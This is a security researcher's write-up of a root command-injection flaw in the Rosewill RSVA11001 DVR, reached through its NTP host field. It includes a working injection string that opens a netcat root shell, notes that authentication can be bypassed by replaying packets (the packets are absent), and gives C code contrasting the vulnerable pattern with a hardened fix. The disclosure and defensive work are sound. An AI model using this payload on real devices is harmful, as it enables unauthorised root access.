Remote Command Injection Vulnerability in Rosewill RSVA11001

The Rosewill RSVA11001 is a home security DVR. I bought one and of course was not content to use it for its original purpose. It's based on a Huawei Hi3515. I downloaded the firmware and, with the help of binwalk, ripped it apart. The firmware is a confusing mess of different file system types and multiple Linux kernels.

I wanted to find a way to get a root shell on the device. Included with the device is a CD with some Windows-based monitoring software. Inspection of the firmware revealed an executable, hi_dvr, that runs on the device and listens on TCP port 8000 for control commands and on TCP port 9000 to stream video. Using the strings command on the executable, I found this gem:

/mnt/ntpdate -q %s > /tmp/tmpfs/ntptmp

So I used the Windows management software to set the NTP host to:

a;/usr/bin/nc -l -p 5555 -e /bin/sh&

Next I power-cycled the box, and a shell was waiting a minute later on port 5555. Of course, the hi_dvr executable runs as root, so you gain root privileges with this method. By default it runs this command on startup and once a day thereafter.
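The pattern behind the bug, reconstructed in C as an added example. This is not hi_dvr's actual code (which is only available as a binary); it assumes the format string above is passed to something like system(), i.e. /bin/sh -c, with the user-supplied NTP host substituted for %s. The vulnerable builder is shown next to a hardened version that whitelists hostname characters and executes ntpdate through execv with an argv vector so no shell ever parses the host. The function and parameter names, and the use of /bin/echo as a stand-in for /mnt/ntpdate in main(), are my own choices for the demonstration.

```c
#include <ctype.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Constructed payload, the same "NTP host" used in the write-up above. */
#define PAYLOAD "a;/usr/bin/nc -l -p 5555 -e /bin/sh&"

/* Vulnerable pattern (reconstruction, not hi_dvr's code): the untrusted host is
 * pasted into a shell command line that is then handed to /bin/sh -c.  The ';'
 * in the payload ends the ntpdate command and the rest runs as a second command.
 * Returns 1 on success (command fits in the buffer), 0 otherwise. */
int build_ntp_cmd_vulnerable(const char *host, char *out, size_t outlen)
{
    int n = snprintf(out, outlen, "/mnt/ntpdate -q %s > /tmp/tmpfs/ntptmp", host);
    return n >= 0 && (size_t)n < outlen;
}

/* Hardened check: accept only hostname / dotted-IPv4 syntax (letters, digits,
 * '-' and '.'), length-limited, no leading '-' (would look like an option) and
 * no empty labels.  Every shell metacharacter is rejected by construction. */
int ntp_host_is_valid(const char *host)
{
    size_t len = strlen(host);
    if (len == 0 || len > 253) return 0;
    if (host[0] == '-' || host[0] == '.') return 0;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)host[i];
        if (!(isalnum(c) || c == '-' || c == '.')) return 0;
        if (c == '.' && host[i + 1] == '.') return 0;   /* empty label */
    }
    return 1;
}

/* Hardened execution: validate, then fork/execv with an argv vector so the host
 * is a single argument and never seen by a shell; the stdout redirect is done in
 * the child with open/dup2 instead of shell syntax.  Returns the child's exit
 * status, or -1 if the host is rejected or fork/waitpid fails. */
int run_ntpdate_safe(const char *ntpdate_path, const char *host, const char *outfile)
{
    if (!ntp_host_is_valid(host)) return -1;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        int fd = open(outfile, O_WRONLY | O_CREAT | O_TRUNC, 0644);
        if (fd < 0) _exit(127);
        dup2(fd, STDOUT_FILENO);
        close(fd);
        char *const argv[] = { (char *)ntpdate_path, "-q", (char *)host, NULL };
        execv(ntpdate_path, argv);
        _exit(127);   /* only reached if execv failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    char cmd[512];
    build_ntp_cmd_vulnerable(PAYLOAD, cmd, sizeof cmd);
    printf("shell would run: %s\n", cmd);
    printf("validator accepts payload:      %d\n", ntp_host_is_valid(PAYLOAD));
    printf("validator accepts pool.ntp.org: %d\n", ntp_host_is_valid("pool.ntp.org"));
    /* /bin/echo stands in for /mnt/ntpdate so this runs on any Linux host. */
    int rc = run_ntpdate_safe("/bin/echo", PAYLOAD, "/tmp/ntptmp.demo");
    printf("run_ntpdate_safe(payload) -> %d (rejected before exec)\n", rc);
    rc = run_ntpdate_safe("/bin/echo", "pool.ntp.org", "/tmp/ntptmp.demo");
    printf("run_ntpdate_safe(pool.ntp.org) -> %d\n", rc);
    return 0;
}
```

Note that the whitelist is the real fix; the execv path only keeps a rejected-by-mistake value from reaching a shell. With the original system() call, even an IP-only restriction would have been enough to stop this payload, since ';', '/', spaces and '&' all fail it.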

As it turns out, the "authentication" done on the command port is just a charade to the user of the management software. Other security researchers had previously identified this. You only need to replay the packets below to exploit the vulnerable shell execution.

The box is not very interesting once you are in. It's a Linux 2.6.24 kernel with RT patches and a BusyBox user space. I don't have access to the SDK for the Hi3515 (different from the Hi3511). The kernel modules for video input, video output, audio output, H.264 encoding, etc. are there, but in binary-only (non-stripped) form. You could probably do some cool hacking on this box, as it has two SATA ports inside.


Here are the base64 encodings of the packets I captured while conducting the exploit. You'll need to convert them from base64 and replay them with something like nc into a TCP connection to port 8000.

This packet sets the NTP host to the shell escape sequence:


This second request to the same port is required to cause the device to save the changes to its flash storage.


Other vulnerable units

The Rosewill RSVA12001 is the same unit with different supplied cameras and should have the same vulnerability.

© Eric Urban 2013